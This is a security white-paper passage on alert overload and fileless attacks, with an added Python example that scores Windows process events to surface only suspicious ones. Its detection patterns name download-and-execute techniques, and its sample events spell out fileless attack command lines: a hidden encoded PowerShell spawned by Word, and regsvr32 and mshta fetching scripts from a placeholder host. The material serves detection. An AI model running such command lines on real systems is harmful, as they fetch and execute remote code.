April 2018
Cyber security is in the midst of a paradigm shift. Targeted attacks are outmaneuvering the prevention and detection mechanisms companies have in place. Signature-based endpoint protection struggles to detect fileless attacks, which are defined by behavior and the abuse of legitimate OS tools rather than by a malicious program being written to disk and installed on a machine. Detection technologies do flag suspicious events, but too often they fail to separate noise from critical incidents, generating volumes of alerts that no team can hope to process.
According to a 2017 EMA study, 79% of security teams report being overwhelmed by high numbers of threat alerts. And it’s no wonder: for example, a study by Ovum found that 37% of banks receive more than 200,000 alerts per day, and 61% receive over 100,000. The Ponemon Institute reports that nearly half of all security alerts are false positives. Of the rest, a large share are inconsequential and easily remedied.
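The two paragraphs above make a detection point and a volume point: fileless attacks are recognisable by behavior (which legitimate tool ran, what it was told to do, and what launched it), and raising an alert on every single match is what buries the few incidents that matter. The following Python example, added here and not taken from the original paper, sketches both ideas over process-creation events: each event is scored against a small set of behavioral indicators, and only events above a threshold are surfaced, highest score first. The event format, the indicator list with its weights, the threshold and the sample events are all constructed for the example and are not a production rule set.

```python
"""
Behavior-based triage of process-creation events (added example).

Scores events on which legitimate Windows binary ran, what spawned it and
what its command line asks for, then keeps only those above a threshold.
Everything below (indicator list, weights, threshold, sample events) is an
assumption made for illustration, not a vendor or page-supplied rule set.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent: str    # image name of the parent process
    image: str     # image name of the created process
    cmdline: str   # full command line


# Legitimate OS binaries commonly abused in fileless attacks (assumed list).
LOLBINS = {
    "powershell.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
    "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe",
}

# Office and reader applications that rarely have a legitimate reason to
# spawn a scripting host or other LOLBin (assumed list).
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe",
}

# Command-line indicators with assumed weights and a human-readable label.
INDICATORS = [
    (re.compile(r"-(?:e|enc|encodedcommand)\b", re.I), 3, "encoded PowerShell command"),
    (re.compile(r"(?:-w|-windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), 3, "in-memory download"),
    (re.compile(r"\biex\b|invoke-expression", re.I), 2, "invoke-expression"),
    (re.compile(r"https?://", re.I), 2, "remote URL on command line"),
    (re.compile(r"scrobj\.dll|/i:", re.I), 3, "regsvr32 scriptlet"),
    (re.compile(r"-urlcache|-decode", re.I), 2, "certutil download/decode"),
]

ALERT_THRESHOLD = 4  # assumed cut-off; tune against your own event volume


def score_event(ev):
    """Return (score, reasons) for one event; 0 if no LOLBin is involved."""
    image = ev.image.lower()
    if image not in LOLBINS:
        return 0, []
    score, reasons = 1, [f"LOLBin {image}"]
    if ev.parent.lower() in SUSPICIOUS_PARENTS:
        score += 3
        reasons.append(f"spawned by {ev.parent.lower()}")
    for pattern, weight, label in INDICATORS:
        if pattern.search(ev.cmdline):
            score += weight
            reasons.append(label)
    return score, reasons


def triage(events, threshold=ALERT_THRESHOLD):
    """Keep only events at or above threshold, highest score first."""
    kept = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            kept.append((score, reasons, ev))
    kept.sort(key=lambda item: item[0], reverse=True)  # stable sort keeps input order on ties
    return kept


# Constructed sample events: two benign admin/OS activities that would be
# noise if alerted on, and three fileless-style behaviors.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "chrome.exe", r"chrome.exe --type=renderer"),
    ProcessEvent("services.exe", "powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    ProcessEvent("winword.exe", "powershell.exe",
                 r"powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("explorer.exe", "regsvr32.exe",
                 r"regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll"),
    ProcessEvent("svchost.exe", "rundll32.exe",
                 r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"),
    ProcessEvent("outlook.exe", "mshta.exe", r"mshta.exe http://203.0.113.10/x.hta"),
]


if __name__ == "__main__":
    for score, reasons, ev in triage(SAMPLE_EVENTS):
        print(f"[{score}] {ev.parent} -> {ev.image}: {', '.join(reasons)}")
```

On the constructed sample, the scheduled inventory script and the Control Panel launch score 1 each and are dropped, while the Word-spawned encoded PowerShell (score 9), the regsvr32 scriptlet fetch (6) and the Outlook-spawned mshta (6) are surfaced. The point is not the specific weights, which an analyst would calibrate against local baselines, but that a single behavior (a LOLBin executing) is weak evidence on its own and only becomes an actionable alert when combined with parent context and command-line intent.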
Able to examine only a tiny fraction of alerts, overstretched security teams are forced to leave the majority of the alerts triggered each day unattended. Teams are left frustrated: EMA found that 52% of operations personnel report high levels of stress, with 21% of them citing "not enough manpower" as a stress driver. The cyber security skills shortage itself is well documented; a 2017 ESG/ISSA study found it worsening and affecting 70% of organizations.